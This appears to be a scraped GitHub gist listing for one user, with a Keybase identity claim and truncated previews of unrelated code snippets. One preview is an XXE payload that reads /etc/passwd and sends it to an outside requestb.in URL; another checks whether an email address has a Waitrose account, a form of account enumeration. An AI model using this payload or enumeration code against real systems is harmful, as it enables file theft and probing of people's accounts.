I hereby claim:
- I am drewsberry on github.
- I am drewsberry (https://keybase.io/drewsberry) on keybase.
- I have a public key whose fingerprint is 32AE 9006 2229 F440 8D5A 3716 F68B AB3B 4A08 2356
To claim this, I am signing this object:
| from datetime import date | |
| import numpy as np | |
| import matplotlib | |
| import matplotlib.pyplot as plt | |
| data = [ | |
| # (version number, date, number of codepoints assigned) | |
| ("1.0.0", date(1991, 10, 1), 7161, ( 5 , 0)), | |
| ("1.0.1", date(1992, 6, 1), 28359, ( 5 , -8)), |
| const facilities = [ | |
| { | |
| code: 0, | |
| name: "FACILITY_NULL", | |
| description: "The default facility code.", | |
| }, | |
| { | |
| code: 1, | |
| name: "FACILITY_RPC", | |
| description: "The source of the error code is an RPC subsystem.", |
| <!ENTITY % data SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://requestb.in/1fjht231?%data;'>"> |
| { | |
| "files.associations": { | |
| "*.cfg": "plaintext" | |
| }, | |
| "window.zoomLevel": 0, | |
| "editor.renderWhitespace": "boundary", | |
| "files.trimTrailingWhitespace": true, | |
| "eslint.enable": true, | |
| "eslint.run": "onType", | |
| "files.insertFinalNewline": true, |
| import click | |
| import requests | |
| def has_waitrose_account(email_address): | |
| """ Checks whether use with input email address has a Waitrose | |
| account. """ | |
| enum_endpoint = "https://www.waitrose.com/shop/" + \ | |
| "LogonIdLookupCmd?_method=GET&" + \ |
| #!/bin/bash | |
| if [[ $UID -ne 0 ]]; then | |
| sudo "$0" | |
| exit | |
| fi | |
| echo "Stopping network manager..." | |
| service network-manager stop | |
| echo "Done." |
| // See https://stackoverflow.com/a/23434948 | |
| function setReferrerHeader(referrerName) { | |
| Object.defineProperty(document, "referrer", { | |
| get: function () { return referrerName; }, | |
| }); | |
| } |
| #!/bin/sh | |
| usage() { | |
| echo "sign INPUT_FILE" | |
| } | |
| keybase_not_found() { | |
| echo >&2 "Keybase command line utilities must be installed to sign files." | |
| exit 1 | |
| } |
| setTimeout(function() { | |
| var $textInput = $('input[name="ctl00$cphBody$txtEmailAddressEnter"]'); | |
| var $submitButton = $('input[name="ctl00$cphBody$btnNext"]'); | |
| var $wheel = $('#wheel'); | |
| if ($textInput.length !== 0) { | |
| var currentEmail = $textInput.val(); | |
| var currentNumber = Number(currentEmail.match(/[\d]+/)[0]); |
I hereby claim:
To claim this, I am signing this object: